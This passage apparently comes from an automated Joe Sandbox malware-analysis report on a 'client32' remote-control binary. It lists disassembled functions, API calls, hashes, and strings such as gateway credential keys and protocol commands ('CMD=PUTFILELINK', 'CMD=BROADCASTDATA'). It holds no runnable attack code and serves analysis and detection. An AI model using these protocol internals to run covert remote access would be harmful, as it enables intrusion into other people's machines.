Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
API String ID: 1194186020-3727536503
Opcode ID: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
Instruction ID: 6b473be9785bc0d4b7e502112369cfe56b08eb277d01e6e1a90085580c10e120
Opcode Fuzzy Hash: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
Instruction Fuzzy Hash: 49B16FB5A007089BD720CF25D894B5AF7F5BF88314F10CA9DEA4A9B640CB70E981DF60

Function 11005390 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D470: __itow.LIBCMT ref: 1105D495

GetObjectA.GDI32(?,0000003C,?), ref: 11005465

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

wsprintfA.USER32 ref: 110054BD
DeleteObject.GDI32(?), ref: 11005512
DeleteObject.GDI32(?), ref: 1100551B
SelectObject.GDI32(?,?), ref: 11005532
DeleteObject.GDI32(?), ref: 11005538
DeleteDC.GDI32(?), ref: 1100553E
SelectObject.GDI32(?,?), ref: 1100554F
DeleteObject.GDI32(?), ref: 11005558
DeleteDC.GDI32(?), ref: 1100555E
DeleteObject.GDI32(?), ref: 1100556F
DeleteObject.GDI32(?), ref: 1100559A
DeleteObject.GDI32(?), ref: 110055B8
DeleteObject.GDI32(?), ref: 110055C1
ShowWindow.USER32(?,00000009), ref: 110055EF
PostQuitMessage.USER32(00000000), ref: 110055F7

Strings

%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 110054B7
PenStyle, xrefs: 110053EF
PenWidth, xrefs: 1100540D
Font, xrefs: 110054CF
Tool, xrefs: 110053B3
PenColour, xrefs: 110053D1
FillStyle, xrefs: 11005449
FillColour, xrefs: 1100542B
Annotate, xrefs: 110053B8, 110053D6, 110053F4, 11005412, 11005430, 1100544E, 110054D4

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 3453958691-770455996
Opcode ID: 26177ce62bbb57279373dbf2d334d62ed57bccf9437a2dbeea888348ad9f5431
Instruction ID: 0e393dd9f50b4abf726b269e2623b848e1bd90be6afddd879db765a1a84127a1
Opcode Fuzzy Hash: 26177ce62bbb57279373dbf2d334d62ed57bccf9437a2dbeea888348ad9f5431
Instruction Fuzzy Hash: 7A813AB5600605AFE364DBA5C990EABF7F9AF8C304F10450DF6AA97241DA71FC41CB60

Function 68C6BED0 Relevance: 44.0, APIs: 7, Strings: 18, Instructions: 200COMMON

Download Yara Rule

APIs

Part of subcall function 68C775B0: _malloc.LIBCMT ref: 68C775D8

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

_free.LIBCMT ref: 68C6BF22

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C6BF51
_free.LIBCMT ref: 68C6BF7C
_free.LIBCMT ref: 68C6C005
_free.LIBCMT ref: 68C6C034
_free.LIBCMT ref: 68C6C063
_free.LIBCMT ref: 68C6C109

Strings

DA=%d, xrefs: 68C6C0B5
YR=%d, xrefs: 68C6C0E1
ID=%d, xrefs: 68C6BEEE
OC=%d, xrefs: 68C6C09F
MO=%d, xrefs: 68C6C0CB
WD=%u, xrefs: 68C6C073
DEPT=%s, xrefs: 68C6BF45
BFLG=%d, xrefs: 68C6BF94
TM=%s, xrefs: 68C6C057
TZ=%d, xrefs: 68C6C0F7
APPTYPE=%d, xrefs: 68C6BF85
SD=%s, xrefs: 68C6BFF9
DATA=, xrefs: 68C6BF9F
UN=%s, xrefs: 68C6BF70
UID=%s, xrefs: 68C6BF16
ED=%s, xrefs: 68C6C028
TIMING=%d, xrefs: 68C6BFC6
WP=%d, xrefs: 68C6C089

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$_malloc$ErrorFreeHeapLast__vswprintf
String ID: APPTYPE=%d$BFLG=%d$DA=%d$DATA=$DEPT=%s$ED=%s$ID=%d$MO=%d$OC=%d$SD=%s$TIMING=%d$TM=%s$TZ=%d$UID=%s$UN=%s$WD=%u$WP=%d$YR=%d
API String ID: 2888336863-1668223812
Opcode ID: 761adc2d1fdb7854c26d823152eddfab71e771d7a9dde13c9b2fceea57442120
Instruction ID: e43dba0dd04508baa54858e459421ca103afccb7ec8b8f8eb192def850199bbc
Opcode Fuzzy Hash: 761adc2d1fdb7854c26d823152eddfab71e771d7a9dde13c9b2fceea57442120
Instruction Fuzzy Hash: DD514DB95402087FE7219B29DCC4E7F73BCEF54618F808429F92A96201FB34E9419BB5

Function 68C758B0 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 262stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C7598A
lstrlenA.KERNEL32(00000000), ref: 68C759B1
_free.LIBCMT ref: 68C75A04
_free.LIBCMT ref: 68C75B4D
_free.LIBCMT ref: 68C75B8B
_free.LIBCMT ref: 68C75C02

Part of subcall function 68C68C30: _memset.LIBCMT ref: 68C68C5B
Part of subcall function 68C68C30: _free.LIBCMT ref: 68C68CCC

_free.LIBCMT ref: 68C75C69

Strings

FLAGS=%u, xrefs: 68C75AF4
ctl_broadcastdata - INVALID PARAMETER, xrefs: 68C7596A
ListenPort, xrefs: 68C75A5D
TCPIP, xrefs: 68C75A39, 68C75A52, 68C75A62
CMD=BROADCASTDATA, xrefs: 68C75A9F
AT=%d, xrefs: 68C75B09
LEN=%d, xrefs: 68C75B9D
GSK=%s, xrefs: 68C75AC9
CSPEC=%s, xrefs: 68C75B7F
Gateway_Gsk, xrefs: 68C75913
DATA=, xrefs: 68C75BCC
*ControlPort, xrefs: 68C75A34
Port, xrefs: 68C75A4D
CHANNEL=%s, xrefs: 68C75B41
FROM=%s:%d, xrefs: 68C75ADF
*Gsk, xrefs: 68C7599B

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$_memset$lstrlen
String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
API String ID: 1776203170-3520600413
Opcode ID: 67c45480f4b1afd345e0fa55405122dfb9de23efcce9a5ef5bdfb96fb9cf44ec
Instruction ID: 959fb1f16d746f53e1beae064c148a2426dafcb67d7fdcf971a0ce281b59601f
Opcode Fuzzy Hash: 67c45480f4b1afd345e0fa55405122dfb9de23efcce9a5ef5bdfb96fb9cf44ec
Instruction Fuzzy Hash: AAA183B5940219AFDB20DB64CC98FEF73BCAF45308F9045D9E159A7181FB349A848FA1

Function 68C6EEA0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 182sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000002F8), ref: 68C6EEC7
WaitForSingleObject.KERNEL32(000002FC,00001388), ref: 68C6EED5
TerminateThread.KERNEL32(000002FC,000000FF), ref: 68C6EEF5
CloseHandle.KERNEL32(000002FC), ref: 68C6EF07
SetEvent.KERNEL32(00000304), ref: 68C6EF16
ctl_hangup.HTCTL32(00000001), ref: 68C6EF26
Sleep.KERNEL32(00000014), ref: 68C6EFB8
CloseHandle.KERNEL32(000002F8), ref: 68C6EFCE
CloseHandle.KERNEL32(00000300), ref: 68C6EFD6
CloseHandle.KERNEL32(00000304), ref: 68C6EFDF
WSACleanup.WSOCK32 ref: 68C6EFE9
CloseHandle.KERNEL32(000002F0), ref: 68C6EFFB
DeleteCriticalSection.KERNEL32(00000002), ref: 68C6F01F
DeleteCriticalSection.KERNEL32(68CAB898), ref: 68C6F03A
_free.LIBCMT ref: 68C6F043

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C6F04F
_free.LIBCMT ref: 68C6F07B
_free.LIBCMT ref: 68C6F08D
_memset.LIBCMT ref: 68C6F0A1
FreeLibrary.KERNEL32(?), ref: 68C6F0BB
timeEndPeriod.WINMM(00000001), ref: 68C6F0D6

Part of subcall function 68C64610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 68C64698

Strings

CMD=CLOSE, xrefs: 68C6EF7D
Error. Terminating httprecv Thread, xrefs: 68C6EEDF

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
String ID: CMD=CLOSE$Error. Terminating httprecv Thread
API String ID: 2861375113-448471891
Opcode ID: 489e6edc1c7ff5fe0d562efa720a0f6a3e89c6a9364564dea4504339428e21c0
Instruction ID: 86c7eabf593ccfa210c08ee0f1a5caea547ef392bd3a58f75d655185e6f9cd2e
Opcode Fuzzy Hash: 489e6edc1c7ff5fe0d562efa720a0f6a3e89c6a9364564dea4504339428e21c0
Instruction Fuzzy Hash: 91516FB5A002099FDB10DFB8DCC0A6F77B8AB4675CB90453AE515D3240FB75E9818BA2

Function 68C62CE0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 68C62A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68C62ACB
Part of subcall function 68C62A90: _strrchr.LIBCMT ref: 68C62ADA
Part of subcall function 68C62A90: _strrchr.LIBCMT ref: 68C62AEA
Part of subcall function 68C62A90: wsprintfA.USER32 ref: 68C62B05

GetModuleHandleA.KERNEL32(NSMTRACE,68C62AB1), ref: 68C62CFA
GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 68C62D15
GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 68C62D22
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 68C62D2F
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 68C62D3C
GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 68C62D49
GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 68C62D56
GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 68C62D63
GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 68C62D70
GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 68C62D7D
GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 68C62D8A

Strings

vRealNSMTrace, xrefs: 68C62D3E
NSMTraceGetConfigItem, xrefs: 68C62D24
NSMTraceExclusive, xrefs: 68C62D65
NSMTraceReadConfigItemFromFile, xrefs: 68C62D58
NSMTraceGetConfigInt, xrefs: 68C62D31
NSMTraceClose, xrefs: 68C62D4B
NSMTRACE, xrefs: 68C62CF5
NSMTraceUnexclusive, xrefs: 68C62D72
NSMTraceLoad, xrefs: 68C62D0F
NSMTraceUnload, xrefs: 68C62D17
NSMTraceSetModuleName, xrefs: 68C62D7F

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
API String ID: 3896832720-3703587661
Opcode ID: 96816d0aa61831d51ad4bda1784b1f494efbc0f38409bc2b2ac9b4a617720a98
Instruction ID: 3e37b2b950bfafd9cedaa05d4bfa80577ad2c714c2d7c8b31cdc7ee14d52ea39
Opcode Fuzzy Hash: 96816d0aa61831d51ad4bda1784b1f494efbc0f38409bc2b2ac9b4a617720a98
Instruction Fuzzy Hash: DF01C0B1C91259EECA50EF7A6C08D8E3AF8AB97395B458416F000D3100F6758845CFE1

Function 68C74CF0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C74D1C
_free.LIBCMT ref: 68C74E16
_free.LIBCMT ref: 68C74E5D
_free.LIBCMT ref: 68C74E8B
_free.LIBCMT ref: 68C74EB9

Part of subcall function 68C77B60: _sprintf.LIBCMT ref: 68C77B77

Part of subcall function 68C777E0: _free.LIBCMT ref: 68C777EF

_free.LIBCMT ref: 68C74EF6

Part of subcall function 68C663C0: EnterCriticalSection.KERNEL32(68CAB898,00000000,?,00000000,?,68C6D77B,00000000), ref: 68C663E8
Part of subcall function 68C663C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 68C663FA
Part of subcall function 68C663C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,68C6D77B,00000000), ref: 68C66412
Part of subcall function 68C663C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68C6643B
Part of subcall function 68C663C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68C6646F
Part of subcall function 68C663C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68C664A3
Part of subcall function 68C663C0: _memset.LIBCMT ref: 68C665C8
Part of subcall function 68C663C0: LeaveCriticalSection.KERNEL32(?,?,68C6D77B,00000000), ref: 68C665D7
Part of subcall function 68C663C0: LeaveCriticalSection.KERNEL32(68CAB898,?,00000000,?,68C6D77B,00000000), ref: 68C665F2

_free.LIBCMT ref: 68C74EED

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C74F09
SetLastError.KERNEL32(?), ref: 68C74F12

Part of subcall function 68C68C30: _memset.LIBCMT ref: 68C68C5B
Part of subcall function 68C68C30: _free.LIBCMT ref: 68C68CCC

Part of subcall function 68C68B50: _memset.LIBCMT ref: 68C68B68
Part of subcall function 68C68B50: wsprintfA.USER32 ref: 68C68B87

Strings

LINK=%s, xrefs: 68C74EAD
CMD=PUTFILELINK, xrefs: 68C74DBB
PWD=%s, xrefs: 68C74E29
GSK=%s, xrefs: 68C74DDC
SUB=%s, xrefs: 68C74E51
Gateway_Gsk, xrefs: 68C74D56
Gateway_Operator, xrefs: 68C74D66
Gateway_Password, xrefs: 68C74D82
FNAME=%s, xrefs: 68C74E7F
ON=%s, xrefs: 68C74E0A

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
API String ID: 2025600352-1925890548
Opcode ID: 49d05986c0b6bcd1b4ac742719ddbdaeab8a012cf2983a409f3def553dd683a0
Instruction ID: 20b5de0399ed807b18ec615b7bde476ffa1cf73a8ece56964aaab4a912452bf0
Opcode Fuzzy Hash: 49d05986c0b6bcd1b4ac742719ddbdaeab8a012cf2983a409f3def553dd683a0
Instruction Fuzzy Hash: 166161B6C4020CABDB11DBE4CC94FFEBBB8AF48318F904019E515AB245FB31A545CBA1

Function 68C70F10 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

_memset.LIBCMT ref: 68C70FAD
EnterCriticalSection.KERNEL32(68CAB898,68CA0E3D,?,?,?,?,?,?,00000000), ref: 68C71293
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,00000000), ref: 68C712E3
EnterCriticalSection.KERNEL32(68CAB898,68CA0E3D,?,?,?,?,?,?,00000000), ref: 68C71316
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,00000000), ref: 68C7132D
std::exception::exception.LIBCMT ref: 68C7135B
__CxxThrowException@8.LIBCMT ref: 68C71376

Strings

MORE, xrefs: 68C7107F
RESULT, xrefs: 68C71061
CAP, xrefs: 68C71121
UID, xrefs: 68C710BE
TXT, xrefs: 68C71100
FLG, xrefs: 68C71163
TIM, xrefs: 68C71142
b, xrefs: 68C712CE
END_REC, xrefs: 68C71250
ENC, xrefs: 68C710DF

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
API String ID: 275297366-914382535
Opcode ID: 0f839421d2eaa545f771223563bdf4a7c94a3cba2f58ff04bb6439563ded3789
Instruction ID: 588f092c72fa8d4ea56363033e22325bc42ec118c21ec2f6aa77da2def874a27
Opcode Fuzzy Hash: 0f839421d2eaa545f771223563bdf4a7c94a3cba2f58ff04bb6439563ded3789
Instruction Fuzzy Hash: 82C14CB5D0025E9FDF20DFA49C91AEEBBB4EF04308F80457AE41AE6241F7345A49CB56

Function 68C6A000 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 197COMMON

Download Yara Rule

APIs

__wcstoui64.LIBCMT ref: 68C6A057

Part of subcall function 68C849AE: strtoxl.LIBCMT ref: 68C849D0

ctl_getsession.HTCTL32(?), ref: 68C6A09B
EnterCriticalSection.KERNEL32(68CAB898,?), ref: 68C6A0BA
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C6A0EB
_strncat.LIBCMT ref: 68C6A132
_free.LIBCMT ref: 68C6A22F
_free.LIBCMT ref: 68C6A238

Strings

CONTROL_NAME, xrefs: 68C6A061
CONNECTION_ID=%u, xrefs: 68C6A198
CONTROL_ADDR, xrefs: 68C6A076
226546, xrefs: 68C6A1A3
NC_, xrefs: 68C6A137, 68C6A13C
CONNECTION_ID, xrefs: 68C6A040
CLIENT_NAME=%s, xrefs: 68C6A1AB
RESULT=%d, xrefs: 68C6A1BD
CMD=CONNECT_REPLY, xrefs: 68C6A187

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection_free$EnterLeave__wcstoui64_strncatctl_getsessionstrtoxl
String ID: 226546$CLIENT_NAME=%s$CMD=CONNECT_REPLY$CONNECTION_ID$CONNECTION_ID=%u$CONTROL_ADDR$CONTROL_NAME$NC_$RESULT=%d
API String ID: 1400833098-1912488439
Opcode ID: f5b57e10019176416484e0aba6b41ecbadb0ff87baac502a24d6ef3ed7495aa5
Instruction ID: a7fbd4a71e0633a458cc0d0f2b0c9755cc629dfd9c962444d55cdcc2416ff169
Opcode Fuzzy Hash: f5b57e10019176416484e0aba6b41ecbadb0ff87baac502a24d6ef3ed7495aa5
Instruction Fuzzy Hash: 3D715EB5D40219AFDB10DFE8DC80BAEBBF8EF48314F54842AE516EB240F77495458BA1

Function 110F5300 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
ShowCursor.USER32(00000000), ref: 110F53D8
OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
TranslateMessage.USER32(?), ref: 110F5443
DispatchMessageA.USER32(?), ref: 110F544C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
CloseHandle.KERNEL32(?), ref: 110F5473
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
TranslateMessage.USER32(?), ref: 110F549E
DispatchMessageA.USER32(?), ref: 110F54A7
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
ShowCursor.USER32(00000001), ref: 110F54C2
SetCursor.USER32(?), ref: 110F54CF

Strings

NSLockExit, xrefs: 110F53DE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
